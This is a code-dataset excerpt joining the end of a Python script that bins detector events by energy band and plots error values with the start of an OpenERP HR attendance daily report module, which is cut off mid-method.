rightmidV2fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(lowV2back):\n temp = numpy.array(lowV2back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV2back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV2back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(midV2fore):\n temp = numpy.array(midV2fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV2fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV2fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(midV2back):\n temp = numpy.array(midV2back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV2back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV2back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(hieV2fore):\n temp = numpy.array(hieV2fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV2fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV2fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(hieV2back):\n temp = numpy.array(hieV2back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV2back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV2back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV2fore):\n temp = numpy.array(maxV2fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV2fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV2fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV2back):\n temp = numpy.array(maxV2back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV2back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV2back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2back.append(numpy.asmatrix(temp))\n x = x + 1\n#version3\nrightlowV3fore = []\nrightlowV3back = []\nrightmidV3fore = []\nrightmidV3back = []\nrighthieV3fore = []\nrighthieV3back = []\nrightmaxV3fore = []\nrightmaxV3back = []\nx = 0\nwhile x < len(lowV3fore):\n temp = numpy.array(lowV3fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV3fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(lowV3back):\n temp = numpy.array(lowV3back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV3back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(midV3fore):\n temp = numpy.array(midV3fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV3fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(midV3back):\n temp = numpy.array(midV3back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV3back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(hieV3fore):\n temp = numpy.array(hieV3fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV3fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(hieV3back):\n temp = numpy.array(hieV3back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV3back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV3fore):\n temp = numpy.array(maxV3fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV3fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV3back):\n temp = numpy.array(maxV3back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV3back.append(numpy.asmatrix(temp))\n x = x + 1\n#version4\nrightlowV4fore = []\nrightlowV4back = []\nrightmidV4fore = []\nrightmidV4back = []\nrighthieV4fore = []\nrighthieV4back = []\nrightmaxV4fore = []\nrightmaxV4back = []\nx = 0\nwhile x < len(lowV4fore):\n temp = numpy.array(lowV4fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV4fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(lowV4back):\n temp = numpy.array(lowV4back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV4back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(midV4fore):\n temp = numpy.array(midV4fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV4fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(midV4back):\n temp = numpy.array(midV4back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV4back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(hieV4fore):\n temp = numpy.array(hieV4fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV4fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(hieV4back):\n temp = numpy.array(hieV4back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV4back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV4fore):\n temp = numpy.array(maxV4fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV4fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV4back):\n temp = numpy.array(maxV4back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV4back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4back.append(numpy.asmatrix(temp))\n x = x + 1\n\n#events\neventslowV1fore = len(rightlowV1fore)\neventslowV1back = len(rightlowV1back)\neventsmidV1fore = len(rightmidV1fore)\neventsmidV1back = len(rightmidV1back)\neventshieV1fore = len(righthieV1fore)\neventshieV1back = len(righthieV1back)\neventsmaxV1fore = len(rightmaxV1fore)\neventsmaxV1back = len(rightmaxV1back)\neventslowV2fore = len(rightlowV2fore)\neventslowV2back = len(rightlowV2back)\neventsmidV2fore = len(rightmidV2fore)\neventsmidV2back = len(rightmidV2back)\neventshieV2fore = len(righthieV2fore)\neventshieV2back = len(righthieV2back)\neventsmaxV2fore = len(rightmaxV2fore)\neventsmaxV2back = len(rightmaxV2back)\neventslowV3fore = len(rightlowV3fore)\neventslowV3back = len(rightlowV3back)\neventsmidV3fore = len(rightmidV3fore)\neventsmidV3back = len(rightmidV3back)\neventshieV3fore = len(righthieV3fore)\neventshieV3back = len(righthieV3back)\neventsmaxV3fore = len(rightmaxV3fore)\neventsmaxV3back = len(rightmaxV3back)\neventslowV4fore = len(rightlowV4fore)\neventslowV4back = len(rightlowV4back)\neventsmidV4fore = len(rightmidV4fore)\neventsmidV4back = len(rightmidV4back)\neventshieV4fore = len(righthieV4fore)\neventshieV4back = len(righthieV4back)\neventsmaxV4fore = len(rightmaxV4fore)\neventsmaxV4back = len(rightmaxV4back)\n\n#energy\nlowV1foreenergy = []\nx = 0\nwhile x < len(rightlowV1fore):\n temp = numpy.array(rightlowV1fore[x])\n lowV1foreenergy.append(temp[0][0])\n x = x + 1\nlowV1backenergy = []\nx = 0\nwhile x < len(rightlowV1back):\n temp = numpy.array(rightlowV1back[x])\n lowV1backenergy.append(temp[0][0])\n x = x + 1\nmidV1foreenergy = []\nx = 0\nwhile x < len(rightmidV1fore):\n temp = numpy.array(rightmidV1fore[x])\n midV1foreenergy.append(temp[0][0])\n x = x + 1\nmidV1backenergy = []\nx = 0\nwhile x < len(rightmidV1back):\n temp = numpy.array(rightmidV1back[x])\n midV1backenergy.append(temp[0][0])\n x = x + 1\nhieV1foreenergy = []\nx = 0\nwhile x < len(righthieV1fore):\n temp = numpy.array(righthieV1fore[x])\n hieV1foreenergy.append(temp[0][0])\n x = x + 1\nhieV1backenergy = []\nx = 0\nwhile x < len(righthieV1back):\n temp = numpy.array(righthieV1back[x])\n hieV1backenergy.append(temp[0][0])\n x = x + 1\nmaxV1foreenergy = []\nx = 0\nwhile x < len(rightmaxV1fore):\n temp = numpy.array(rightmaxV1fore[x])\n maxV1foreenergy.append(temp[0][0])\n x = x + 1\nmaxV1backenergy = []\nx = 0\nwhile x < len(rightmaxV1back):\n temp = numpy.array(rightmaxV1back[x])\n maxV1backenergy.append(temp[0][0])\n x = x + 1\nlowV2foreenergy = []\nx = 0\nwhile x < len(rightlowV2fore):\n temp = numpy.array(rightlowV2fore[x])\n lowV2foreenergy.append(temp[0][0])\n x = x + 1\nlowV2backenergy = []\nx = 0\nwhile x < len(rightlowV2back):\n temp = numpy.array(rightlowV2back[x])\n lowV2backenergy.append(temp[0][0])\n x = x + 1\nmidV2foreenergy = []\nx = 0\nwhile x < len(rightmidV2fore):\n temp = numpy.array(rightmidV2fore[x])\n midV2foreenergy.append(temp[0][0])\n x = x + 1\nmidV2backenergy = []\nx = 0\nwhile x < len(rightmidV2back):\n temp = numpy.array(rightmidV2back[x])\n midV2backenergy.append(temp[0][0])\n x = x + 1\nhieV2foreenergy = []\nx = 0\nwhile x < len(righthieV2fore):\n temp = numpy.array(righthieV2fore[x])\n hieV2foreenergy.append(temp[0][0])\n x = x + 1\nhieV2backenergy = []\nx = 0\nwhile x < len(righthieV2back):\n temp = numpy.array(righthieV2back[x])\n hieV2backenergy.append(temp[0][0])\n x = x + 1\nmaxV2foreenergy = []\nx = 0\nwhile x < len(rightmaxV2fore):\n temp = numpy.array(rightmaxV2fore[x])\n maxV2foreenergy.append(temp[0][0])\n x = x + 1\nmaxV2backenergy = []\nx = 0\nwhile x < len(rightmaxV2back):\n temp = numpy.array(rightmaxV2back[x])\n maxV2backenergy.append(temp[0][0])\n x = x + 1\nlowV3foreenergy = []\nx = 0\nwhile x < len(rightlowV3fore):\n temp = numpy.array(rightlowV3fore[x])\n lowV3foreenergy.append(temp[0][0])\n x = x + 1\nlowV3backenergy = []\nx = 0\nwhile x < len(rightlowV3back):\n temp = numpy.array(rightlowV3back[x])\n lowV3backenergy.append(temp[0][0])\n x = x + 1\nmidV3foreenergy = []\nx = 0\nwhile x < len(rightmidV3fore):\n temp = numpy.array(rightmidV3fore[x])\n midV3foreenergy.append(temp[0][0])\n x = x + 1\nmidV3backenergy = []\nx = 0\nwhile x < len(rightmidV3back):\n temp = numpy.array(rightmidV3back[x])\n midV3backenergy.append(temp[0][0])\n x = x + 1\nhieV3foreenergy = []\nx = 0\nwhile x < len(righthieV3fore):\n temp = numpy.array(righthieV3fore[x])\n hieV3foreenergy.append(temp[0][0])\n x = x + 1\nhieV3backenergy = []\nx = 0\nwhile x < len(righthieV3back):\n temp = numpy.array(righthieV3back[x])\n hieV3backenergy.append(temp[0][0])\n x = x + 1\nmaxV3foreenergy = []\nx = 0\nwhile x < len(rightmaxV3fore):\n temp = numpy.array(rightmaxV3fore[x])\n maxV3foreenergy.append(temp[0][0])\n x = x + 1\nmaxV3backenergy = []\nx = 0\nwhile x < len(rightmaxV3back):\n temp = numpy.array(rightmaxV3back[x])\n maxV3backenergy.append(temp[0][0])\n x = x + 1\nlowV4foreenergy = []\nx = 0\nwhile x < len(rightlowV4fore):\n temp = numpy.array(rightlowV4fore[x])\n lowV4foreenergy.append(temp[0][0])\n x = x + 1\nlowV4backenergy = []\nx = 0\nwhile x < len(rightlowV4back):\n temp = numpy.array(rightlowV4back[x])\n lowV4backenergy.append(temp[0][0])\n x = x + 1\nmidV4foreenergy = []\nx = 0\nwhile x < len(rightmidV4fore):\n temp = numpy.array(rightmidV4fore[x])\n midV4foreenergy.append(temp[0][0])\n x = x + 1\nmidV4backenergy = []\nx = 0\nwhile x < len(rightmidV4back):\n temp = numpy.array(rightmidV4back[x])\n midV4backenergy.append(temp[0][0])\n x = x + 1\nhieV4foreenergy = []\nx = 0\nwhile x < len(righthieV4fore):\n temp = numpy.array(righthieV4fore[x])\n hieV4foreenergy.append(temp[0][0])\n x = x + 1\nhieV4backenergy = []\nx = 0\nwhile x < len(righthieV4back):\n temp = numpy.array(righthieV4back[x])\n hieV4backenergy.append(temp[0][0])\n x = x + 1\nmaxV4foreenergy = []\nx = 0\nwhile x < len(rightmaxV4fore):\n temp = numpy.array(rightmaxV4fore[x])\n maxV4foreenergy.append(temp[0][0])\n x = x + 1\nmaxV4backenergy = []\nx = 0\nwhile x < len(rightmaxV4back):\n temp = numpy.array(rightmaxV4back[x])\n maxV4backenergy.append(temp[0][0])\n x = x + 1\n\nerrorlowV1fore = eventslowV1fore*(sum(lowV1foreenergy)/len(lowV1fore))**2/(lowband*lowexposure*pixV1fore)\nerrorlowV1back = eventslowV1back*(sum(lowV1backenergy)/len(lowV1back))**2/(lowband*lowexposure*pixV1back)\nerrormidV1fore = eventsmidV1fore*(sum(midV1foreenergy)/len(midV1fore))**2/(midband*midexposure*pixV1fore)\nerrormidV1back = eventsmidV1back*(sum(midV1backenergy)/len(midV1back))**2/(midband*midexposure*pixV1back)\nerrorhieV1fore = eventshieV1fore*(sum(hieV1foreenergy)/len(hieV1fore))**2/(hieband*hieexposure*pixV1fore)\nerrorhieV1back = eventshieV1back*(sum(hieV1backenergy)/len(hieV1back))**2/(hieband*hieexposure*pixV1back)\nerrormaxV1fore = eventsmaxV1fore*(sum(maxV1foreenergy)/len(maxV1fore))**2/(maxband*maxexposure*pixV1fore)\nerrormaxV1back = eventsmaxV1back*(sum(maxV1backenergy)/len(maxV1back))**2/(maxband*maxexposure*pixV1back)\nerrorlowV2fore = eventslowV2fore*(sum(lowV2foreenergy)/len(lowV2fore))**2/(lowband*lowexposure*pixV2fore)\nerrorlowV2back = eventslowV2back*(sum(lowV2backenergy)/len(lowV2back))**2/(lowband*lowexposure*pixV2back)\nerrormidV2fore = eventsmidV2fore*(sum(midV2foreenergy)/len(midV2fore))**2/(midband*midexposure*pixV2fore)\nerrormidV2back = eventsmidV2back*(sum(midV2backenergy)/len(midV2back))**2/(midband*midexposure*pixV2back)\nerrorhieV2fore = eventshieV2fore*(sum(hieV2foreenergy)/len(hieV2fore))**2/(hieband*hieexposure*pixV2fore)\nerrorhieV2back = eventshieV2back*(sum(hieV2backenergy)/len(hieV2back))**2/(hieband*hieexposure*pixV2back)\nerrormaxV2fore = eventsmaxV2fore*(sum(maxV2foreenergy)/len(maxV2fore))**2/(maxband*maxexposure*pixV2fore)\nerrormaxV2back = eventsmaxV2back*(sum(maxV2backenergy)/len(maxV2back))**2/(maxband*maxexposure*pixV2back)\nerrorlowV3fore = eventslowV3fore*(sum(lowV3foreenergy)/len(lowV3fore))**2/(lowband*lowexposure*pixV3fore)\nerrorlowV3back = eventslowV3back*(sum(lowV3backenergy)/len(lowV3back))**2/(lowband*lowexposure*pixV3back)\nerrormidV3fore = eventsmidV3fore*(sum(midV3foreenergy)/len(midV3fore))**2/(midband*midexposure*pixV3fore)\nerrormidV3back = eventsmidV3back*(sum(midV3backenergy)/len(midV3back))**2/(midband*midexposure*pixV3back)\nerrorhieV3fore = eventshieV3fore*(sum(hieV3foreenergy)/len(hieV3fore))**2/(hieband*hieexposure*pixV3fore)\nerrorhieV3back = eventshieV3back*(sum(hieV3backenergy)/len(hieV3back))**2/(hieband*hieexposure*pixV3back)\nerrormaxV3fore = eventsmaxV3fore*(sum(maxV3foreenergy)/len(maxV3fore))**2/(maxband*maxexposure*pixV3fore)\nerrormaxV3back = eventsmaxV3back*(sum(maxV3backenergy)/len(maxV3back))**2/(maxband*maxexposure*pixV3back)\nerrorlowV4fore = eventslowV4fore*(sum(lowV4foreenergy)/len(lowV4fore))**2/(lowband*lowexposure*pixV4fore)\nerrorlowV4back = eventslowV4back*(sum(lowV4backenergy)/len(lowV4back))**2/(lowband*lowexposure*pixV4back)\nerrormidV4fore = eventsmidV4fore*(sum(midV4foreenergy)/len(midV4fore))**2/(midband*midexposure*pixV4fore)\nerrormidV4back = eventsmidV4back*(sum(midV4backenergy)/len(midV4back))**2/(midband*midexposure*pixV4back)\nerrorhieV4fore = eventshieV4fore*(sum(hieV4foreenergy)/len(hieV4fore))**2/(hieband*hieexposure*pixV4fore)\nerrorhieV4back = eventshieV4back*(sum(hieV4backenergy)/len(hieV4back))**2/(hieband*hieexposure*pixV4back)\nerrormaxV4fore = eventsmaxV4fore*(sum(maxV4foreenergy)/len(maxV4fore))**2/(maxband*maxexposure*pixV4fore)\nerrormaxV4back = eventsmaxV4back*(sum(maxV4backenergy)/len(maxV4back))**2/(maxband*maxexposure*pixV4back)\n\n########calculated#########\n########calculated#########\n########calculated#########\n########calculated#########\n########calculated#########\n\nlowenergy = [1467.65,1467.65,1467.65,1467.65]\nmidenergy = [3161.32,3161.32,3161.32,3161.32]\nhieenergy = [6809.48,6809.48,6809.48,6809.48]\nmaxenergy = [14667.6,14667.6,14667.6,14667.6]\n\nenergyx = []\nx = 0\nwhile x < len(lowenergy):\n energyx.append(lowenergy[x])\n x = x + 1\nx = 0\nwhile x < len(midenergy):\n energyx.append(midenergy[x])\n x = x + 1\nx = 0\nwhile x < len(hieenergy):\n energyx.append(hieenergy[x])\n x = x + 1\nx = 0\nwhile x < len(maxenergy):\n energyx.append(maxenergy[x])\n x = x + 1\n\n#errory = [errorlowV1fore,errorlowV1back,errormidV1fore,errormidV1back,errorhieV1fore,errorhieV1back,errormaxV1fore,errormaxV1back,\n# errorlowV2fore,errorlowV2back,errormidV2fore,errormidV2back,errorhieV2fore,errorhieV2back,errormaxV2fore,errormaxV2back,\n# errorlowV3fore,errorlowV3back,errormidV3fore,errormidV3back,errorhieV3fore,errorhieV3back,errormaxV3fore,errormaxV3back,\n# errorlowV4fore,errorlowV4back,errormidV4fore,errormidV4back,errorhieV4fore,errorhieV4back,errormaxV4fore,errormaxV4back]\nerrory = [errorlowV1fore-errorlowV1back,errormidV1fore-errormidV1back,errorhieV1fore-errorhieV1back,errormaxV1fore-errormaxV1back,\n errorlowV2fore-errorlowV2back,errormidV2fore-errormidV2back,errorhieV2fore-errorhieV2back,errormaxV2fore-errormaxV2back,\n errorlowV3fore-errorlowV3back,errormidV3fore-errormidV3back,errorhieV3fore-errorhieV3back,errormaxV3fore-errormaxV3back,\n errorlowV4fore-errorlowV4back,errormidV4fore-errormidV4back,errorhieV4fore-errorhieV4back,errormaxV4fore-errormaxV4back]\n\nfig = plt.figure()\nX = energyx\nY = errory\n\nplt.plot(X,Y,'.')\nplt.xscale('log')\nplt.show()","sub_path":"error bars v1 pt 3.py","file_name":"error bars v1 pt 3.py","file_ext":"py","file_size_in_byte":54687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"241909130","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nimport time\nfrom lxml import etree\nfrom dateutil import rrule\nfrom datetime import datetime, timedelta\nfrom openerp.tools.misc import DEFAULT_SERVER_DATETIME_FORMAT\nfrom openerp.tools.misc import DEFAULT_SERVER_DATE_FORMAT\nfrom openerp.addons.dm_base import utils\n\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\nimport openerp.addons.decimal_precision as dp\n'''\nAttendance report by employee and day, working period\n'''\nclass hr_rpt_attend_emp_day(osv.osv):\n _name = \"hr.rpt.attend.emp.day\"\n _description = \"HR Attendance Employee Daily Report\"\n _columns = {\n 'name': fields.char('Report Name', size=32, required=False),\n 'title': fields.char('Report Title', required=False),\n 'type': fields.char('Report Type', size=16, required=True),\n 'company_id': fields.many2one('res.company','Company',required=True), \n \n #report data lines\n 'rpt_lines': fields.one2many('hr.rpt.attend.emp.day.line', 'rpt_id', string='Report Line'),\n 'date_from': fields.datetime(\"Start Date\", required=True),\n 'date_to': fields.datetime(\"End Date\", required=True),\n 'emp_ids': fields.many2many('hr.employee', string='Selected Employees'),\n \n 'state': fields.selection([\n ('draft', 'Draft'),\n ('confirmed', 'Confirmed'),\n ('cancel', 'Cancel'),\n ], 'Status', select=True, readonly=True, track_visibility='onchange'), \n \n 'note': fields.text('Description', readonly=False, states={'done':[('readonly',True)]}),\n 'attend_month_ids': fields.one2many('hr.rpt.attend.month', 'attend_day_id', string='Attendances Monthly', readonly=True),\n }\n\n _defaults = {\n 'type': 'attend_emp_day', \n 'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'account.rptcn', context=c),\n 'state': 'draft', \n }\n \n def copy(self, cr, uid, id, default=None, context=None):\n if not default:\n default = {}\n default['attend_month_ids'] = None\n default['rpt_lines'] = None\n return super(hr_rpt_attend_emp_day, self).copy(cr, uid, id, default, context)\n \n def default_get(self, cr, uid, fields, context=None):\n vals = super(hr_rpt_attend_emp_day, self).default_get(cr, uid, fields, context=context)\n if 'date_from' in fields:\n #For the datetime value in defaults, need convert the local time to UTC, the web framework will convert them back to local time on GUI\n date_from =datetime.strptime(time.strftime('%Y-%m-01 00:00:00'), '%Y-%m-%d %H:%M:%S')\n date_from_utc = utils.utc_timestamp(cr, uid, date_from, context)\n vals.update({'date_from':date_from_utc.strftime(DEFAULT_SERVER_DATETIME_FORMAT)})\n \n if 'date_to' in fields:\n date_to = datetime.strptime(time.strftime('%Y-%m-%d 23:59:59'), '%Y-%m-%d %H:%M:%S') \n date_to_utc = utils.utc_timestamp(cr, uid, date_to, context) \n vals.update({'date_to':date_to_utc.strftime(DEFAULT_SERVER_DATETIME_FORMAT)})\n \n return vals\n \n def _check_dates(self, cr, uid, ids, context=None):\n for wiz in self.browse(cr, uid, ids, context=context):\n if wiz.date_from and wiz.date_to and wiz.date_from > wiz.date_to:\n return False\n return True\n\n _constraints = [\n (_check_dates, 'The date end must be after the date start.', ['date_from','date_to']),\n ]\n \n def get_report_name(self, cr, uid, id, rpt_name, context=None):\n return \"Attendance Employee Daily Report\"\n \n def name_get(self, cr, uid, ids, context=None):\n if not ids:\n return []\n if isinstance(ids,(int,long)):\n ids = [ids]\n res = []\n for row in self.read(cr, uid, ids, ['name'], context=context):\n res.append((row['id'],'[%s]%s'%(row['id'],row['name']) ))\n return res\n \n def _convert_save_dates(self, cr, uid, vals, context):\n #convert to the date like '2013-01-01' to UTC datetime to store\n if 'date_from' in vals and len(vals['date_from']) == 10:\n date_from = vals['date_from']\n date_from = utils.utc_timestamp(cr, uid, datetime.strptime(date_from + ' 00:00:00', DEFAULT_SERVER_DATETIME_FORMAT),context=context)\n date_from = date_from.strftime(DEFAULT_SERVER_DATETIME_FORMAT)\n vals['date_from'] = date_from\n if 'date_to' in vals and len(vals['date_to']) == 10:\n date_to = vals['date_to']\n date_to = utils.utc_timestamp(cr, uid, datetime.strptime(date_to + ' 23:59:59', DEFAULT_SERVER_DATETIME_FORMAT),context=context)\n date_to = date_to.strftime(DEFAULT_SERVER_DATETIME_FORMAT)\n vals['date_to'] = date_to\n \n def create(self, cr, uid, vals, context=None):\n if 'name' not in vals or not vals['name']:\n date_to = vals['date_to']\n if date_to and len(date_to) == 10:\n date_to = vals['date_to'] + ' 00:00:00'\n date_to = datetime.strptime(date_to, DEFAULT_SERVER_DATETIME_FORMAT)\n name = '%s-%s'%(date_to.year, date_to.month)\n vals['name'] = name\n self._convert_save_dates(cr, uid, vals, context)\n id_new = super(hr_rpt_attend_emp_day, self).create(cr, uid, vals, context=context)\n return id_new\n \n def write(self, cr, uid, ids, vals, context=None):\n if isinstance(ids, (int, long)):\n ids = [ids]\n self._convert_save_dates(cr, uid, vals, context)\n old_emp_ids = []\n if 'emp_ids' in vals:\n old_emp_ids = self.read(cr, uid, ids[0], ['emp_ids'],context=context)['emp_ids']\n resu = super(hr_rpt_attend_emp_day, self).write(cr, uid, ids, vals, context=context)\n new_emp_ids = self.read(cr, uid, ids[0], ['emp_ids'],context=context)['emp_ids']\n if old_emp_ids: \n 